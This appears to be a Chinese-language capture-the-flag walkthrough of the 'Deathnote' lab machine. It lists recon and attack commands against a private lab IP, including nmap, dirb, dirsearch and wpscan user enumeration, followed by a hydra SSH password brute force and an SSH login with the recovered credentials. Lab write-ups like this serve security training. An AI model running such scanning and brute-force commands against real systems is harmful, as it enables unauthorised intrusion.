Kali:172.88.6.144
靶场:172.88.6.92
arp-scan -l
nmap -T4 -sV -P -A 172.88.6.92
访问web服务时发现会自动跳转到:http://deathnote.vuln/wordpress/页面,但是显示404,想着应该是未配置dns的问题。那就配置下dns信息,win:打开C:\Windows\System32\drivers\etc\hosts文件,添加:172.88.6.92 deathnote.vuln。kali:打开/etc/hosts文件,添加:172.88.6.92 deathnote.vuln。即可正常访问页面
翻译过后是这个样子,告诉我们要找到一个note.txt文件并且查看下L的comment
找到一个名字L,用dirb对网站进行扫描
dirb http://172.88.6.92 -X .txt,.html,.php,.bak,.bac,.sql,.php.bac,.jpg
dirb http://172.88.6.92 -r
把照片下载到本地wget http://172.88.6.92/important.jpg
cat important.jpg
点击一下网站上的hint,这里提示找到server上的note.txt或者看L的留言。L的留言应该指的是下面的
“my fav line is iamjustic3”,获得一个密码:iamjustic3
扫描这个ip后,发现一个登录页面dirsearch -u http://172.88.6.92/
执行这条语句的时候,记得kali也要更改hosts
wpscan --url http://deathnote.vuln/wordpress/ -e u
这个应该就是用户名了吧,kira
输入账号,点击this email is correct
将这个文件放到kali中,然后用九头蛇hydra爆破
hydra -l l -P test.txt ssh://172.88.6.92
ssh l@172.88.6.92
i think u got the shell , but you wont be able to kill me -kira
cGFzc3dkIDoga2lyYWlzZXZpbCA=
passwd : kiraisevil
